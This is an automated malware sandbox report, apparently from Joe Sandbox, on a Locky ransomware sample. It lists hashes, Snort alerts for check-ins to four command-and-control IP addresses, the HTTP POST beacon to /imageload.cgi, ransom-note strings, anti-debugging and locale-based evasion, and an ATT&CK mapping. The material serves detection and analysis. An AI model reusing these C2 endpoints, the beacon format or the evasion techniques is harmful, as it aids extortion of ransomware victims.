Edit tour

Windows Analysis Report
LockyRansom.exe

Overview

General Information

Sample name:	LockyRansom.exe
Analysis ID:	1446225
MD5:	1720b1748ad7b8ac0bfc1c3636fead95
SHA1:	97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256:	3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
Tags:	exeLockyRansomware
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

AI detected suspicious sample

Found evasive API chain (may stop execution after checking locale)

Found potential ransomware demand text

Machine Learning detection for sample

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

PE file contains sections with non-standard names

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LockyRansom.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\LockyRansom.exe" MD5: 1720B1748AD7B8AC0BFC1C3636FEAD95)

cleanup

Snort Signatures

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 185.179.190.31

Timestamp:	05/23/24-01:13:30.810315
SID:	2023551
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 46.17.44.153

Timestamp:	05/23/24-01:13:53.178351
SID:	2023551
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 46.17.44.153

Timestamp:	05/23/24-01:13:53.178351
SID:	2023577
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 46.17.44.153

Timestamp:	05/23/24-01:13:53.178351
SID:	2023552
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 37.143.9.154

Timestamp:	05/23/24-01:13:52.300122
SID:	2023551
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 37.143.9.154

Timestamp:	05/23/24-01:13:52.300122
SID:	2023552
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 37.143.9.154

Timestamp:	05/23/24-01:13:52.300122
SID:	2023577
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 46.183.165.45

Timestamp:	05/23/24-01:14:14.647859
SID:	2023552
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 185.179.190.31

Timestamp:	05/23/24-01:14:36.143686
SID:	2023577
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 46.17.44.153

Timestamp:	05/23/24-01:14:58.402198
SID:	2023551
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 46.183.165.45

Timestamp:	05/23/24-01:14:14.647859
SID:	2023551
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 37.143.9.154

Timestamp:	05/23/24-01:14:57.599658
SID:	2023577
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 46.17.44.153

Timestamp:	05/23/24-01:14:58.402198
SID:	2023552
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 185.179.190.31

Timestamp:	05/23/24-01:14:36.143686
SID:	2023552
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 185.179.190.31

Timestamp:	05/23/24-01:14:36.143686
SID:	2023551
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 46.17.44.153

Timestamp:	05/23/24-01:14:58.402198
SID:	2023577
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 46.183.165.45

Timestamp:	05/23/24-01:14:14.647859
SID:	2023577
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 - Source IP: 192.168.2.7 - Destination IP: 37.143.9.154

Timestamp:	05/23/24-01:14:57.599658
SID:	2023551
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 37.143.9.154

Timestamp:	05/23/24-01:14:57.599658
SID:	2023552
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC Checkin HTTP Pattern - Source IP: 192.168.2.7 - Destination IP: 185.179.190.31

Timestamp:	05/23/24-01:13:30.810315
SID:	2023577
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Locky CnC checkin Nov 21 M2 - Source IP: 192.168.2.7 - Destination IP: 185.179.190.31

Timestamp:	05/23/24-01:13:30.810315
SID:	2023552
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: */*Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive

Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgin
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgir
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imag=
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiC
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgid
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgilh
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiy
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi0
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiL
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiV
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgik
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiy3
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.1531oad.cgi%880
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/download/download-easy.html

Spam, unwanted Advertisements and Ransom Demands

Found potential ransomware demand text

Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted with RSA-2048 and AES-128 ciphers.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : To receive your private key follow one of the links:

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,		0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,		0_2_0041544C

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004022D0	0_2_004022D0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040A58C	0_2_0040A58C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004029C0	0_2_004029C0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040B2C4	0_2_0040B2C4
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040940E	0_2_0040940E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040995F	0_2_0040995F
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00409EB0	0_2_00409EB0

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: String function: 004182C0 appears 33 times
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: String function: 004761A0 appears 36 times

Source: LockyRansom.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.rans.evad.winEXE@1/0@0/4

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040CC4E CoCreateInstance,

0_2_0040CC4E

Source: C:\Users\user\Desktop\LockyRansom.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LockyRansom.exe

ReversingLabs: Detection: 95%

Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mciwave.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: gfiwave.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\LockyRansom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: LockyRansom.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: gefas.pdb source: LockyRansom.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004079B0

Source: LockyRansom.exe

Static PE information: section name: .dec

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00404705 push ecx; ret	0_2_00404718
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004029AB push ecx; ret	0_2_004029BB
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00401408 push eax; ret	0_2_00401426

Source: LockyRansom.exe

Static PE information: section name: .rdata entropy: 7.910838175775477

Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\LockyRansom.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-30147

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040C58C rdtsc

0_2_0040C58C

Source: C:\Users\user\Desktop\LockyRansom.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-30143

Source: C:\Users\user\Desktop\LockyRansom.exe

API coverage: 7.7 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0042D5D0 FindClose,FindFirstFileW,

0_2_0042D5D0

Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\LockyRansom.exe

API call chain: ExitProcess graph end node

graph_0-30145

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040C58C rdtsc

0_2_0040C58C

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00405393

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004079B0

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_005C007E push dword ptr fs:[00000030h]	0_2_005C007E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_005C03EE push dword ptr fs:[00000030h]	0_2_005C03EE
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0069007E push dword ptr fs:[00000030h]	0_2_0069007E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_006903EE push dword ptr fs:[00000030h]	0_2_006903EE

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00405393
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00403A6C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00405F08 SetUnhandledExceptionFilter,	0_2_00405F08

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0041973D SetSecurityDescriptorDacl,

0_2_0041973D

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004197BD AllocateAndInitializeSid,

0_2_004197BD

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: GetLocaleInfoA,GetUserDefaultUILanguage,

0_2_0042E700

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406718

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00423053 GetVersionExA,

0_2_00423053

Source: C:\Users\user\Desktop\LockyRansom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	21 Software Packing	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	114 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
LockyRansom.exe	96%	ReversingLabs	Win32.Ransomware.Locky
LockyRansom.exe	100%	Avira	TR/Lethic.X
LockyRansom.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://37.143.9.154/imageload.cgiy	0%	Avira URL Cloud	safe
http://37.143.9.154/imageload.cgiC	0%	Avira URL Cloud	safe
https://www.torproject.org/download/download-easy.html	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgiL	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgiV	0%	Avira URL Cloud	safe
http://46.183.165.45/imageload.cgia-deddda976288	0%	Avira URL Cloud	safe
http://46.17.44.1531oad.cgi%880	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgi	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgi0.31/imageload.cgi	0%	Avira URL Cloud	safe
http://37.143.9.154/imageload.cgi	0%	Avira URL Cloud	safe
http://37.143.9.154/imag=	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgiP	0%	Avira URL Cloud	safe
http://46.183.165.45/imageload.cgi	0%	Avira URL Cloud	safe
http://185.179.190.31/imageload.cgir	0%	Avira URL Cloud	safe
http://46.17.44.153	0%	Avira URL Cloud	safe
http://37.143.9.154/imageload.cgilh	0%	Avira URL Cloud	safe
http://185.179.190.31/imageload.cgin	0%	Avira URL Cloud	safe
http://37.143.9.154/imageload.cgid	0%	Avira URL Cloud	safe
http://37.143.9.154/imageload.cgii	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgiy3	0%	Avira URL Cloud	safe
http://46.17.44.153/	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgii	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgik	0%	Avira URL Cloud	safe
http://46.183.165.45/	0%	Avira URL Cloud	safe
http://46.17.44.153/imageload.cgi0	0%	Avira URL Cloud	safe
http://37.143.9.154/imageload.cgiP	0%	Avira URL Cloud	safe
http://185.179.190.31/imageload.cgi	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://46.17.44.153/imageload.cgi	true	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgi	true	Avira URL Cloud: safe	unknown
http://46.183.165.45/imageload.cgi	true	Avira URL Cloud: safe	unknown
http://185.179.190.31/imageload.cgi	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://46.17.44.153/imageload.cgi0.31/imageload.cgi	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgiC	LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgiy	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.1531oad.cgi%880	LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.torproject.org/download/download-easy.html	LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgiL	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.183.165.45/imageload.cgia-deddda976288	LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgiV	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imag=	LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgiP	LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.179.190.31/imageload.cgir	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgii	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgilh	LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.17.44.153/imageload.cgiy3	LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
